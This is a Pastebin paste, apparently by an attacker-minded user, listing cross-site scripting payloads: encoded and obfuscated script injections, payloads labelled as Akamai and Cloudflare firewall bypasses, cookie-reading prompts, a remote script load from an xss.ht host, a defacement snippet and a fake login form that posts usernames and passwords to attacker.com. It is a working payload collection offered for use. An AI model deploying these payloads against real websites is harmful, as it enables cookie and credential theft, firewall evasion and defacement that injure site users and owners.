colded

XSS

Jun 26th, 2019 (edited)
1,038
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. XSS
  2. %0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
  3. -->"/><sCript<deTailS open x=">" ontoggle=(co\u006efirm)''>
  4. <a href="javascript&Tab;:alert(1)">Click Me</a>
  5. </script><script/%0A<k>alert`1`//
  6. ["</script><script>alert(document.domain);</script>"]=123
  7. "></script><script>prompt(" Test", document.domain);</script>
  8. <script>alert(document.cookie);</script>
  9. -TEST<br><br><center><font color="red">Tested<br><br><img src=x onclick=alert(1)><br><br><img src=x onerror=prompt(1)>
  10. {{constructor.constructor('alert(document.domain)')()}}
  11. "'--!><Script /K/>confirm(1)</Script /K/>#
  12. <a href=[javascript&':alert(1)']>test
  13. <img src=x onerror=prompt(1)>
  14. &quote;><img src=x onerror=confirm(1);>
  15. http://x.com/"onmouseover="alert(document.domain)
  16. <script%0a>alert(1)</script%0a>
  17. <iframe/src=//l❤️.io>
  18. <img/src=//🤣.io>
  19. <scrip❤t>prompt(1)</scrip❤t>
  20. <"/*'/*</Title/</Script/--><svg/**/; OnlOad=(alert)(1)//>
  21. <a title="'test" ismap="alert xss" yyy="test" &#39; href="http://evil.com">Click Me</a><br><br>
  22. <script>a ="</script><img src=p onerror='prompt(1)'/>"
  23. "><svg0%aonload="alert(document.domain)>
  24. "><svg/onload="alert(document.domain)>
  25. x<a href=javascript&colon;alert&lpar;1),alert&lpar;2)>X</a>
  26. <%5X%2XOn%5Xointerup=%7Xrompt(1)>
  27. <Svg/Onload=top%5B"al"%2B"ert%5D(1)//
  28. {{this.constructor.constructor('alert("foo")')()}}
  29. test'-Function`self['a'\x2b'l'\x2b'e'\x2b'r'\x2b't']\x281\x29```-'
  30. <iframe SrcDoc="<Script Src=https://darkgent.xss.ht></Script">
  31. 1<!--><Svg OnLoad=(confirm)(1)-->
  32.  
  33. Akamai Waf Bypass
  34.  
  35. <marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee>
  36. <marquee loop=1 width=0 onfinish=pr\u006fmpt("xss_by_Y000")>Y000</marquee>
  37. javascript:new%20Function`al\ert\`1\``;
  38. <noscript><p title='</noscript><svg onload=prompt&#40;1&#41;>'>
  39.  
  40.  
  41. Cloudflare bypass :
  42.  
  43. <img src=x Onerror="top[8680439..toString(30)](1)">
  44. "><svg onload=alert%26%230000000040"1")>
  45. {` <body \< onscroll =1(=prompt,(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
  46.  
  47. HTML Injection
  48. "><marquee><h1>XSS Attack</marquee></h1>
  49. <center><img src="https://anoncyberteam.or.id/images/act.png" width="500" height="500"></center><font color="red" size="100px" face="courier new">XSS By Mr.Colded%85
  50.  
  51. <form method='POST' action='http://attacker.com/capture.php' id="login-form">
  52.  
  53. Username :<br><input type='text' name='username' value=''>
  54. <br>
  55. Password :<br><input type='password' name='password' value=''>
  56.  
  57. <input type='submit' value='submit'>
  58.  
  59. </form>
RAW Paste Data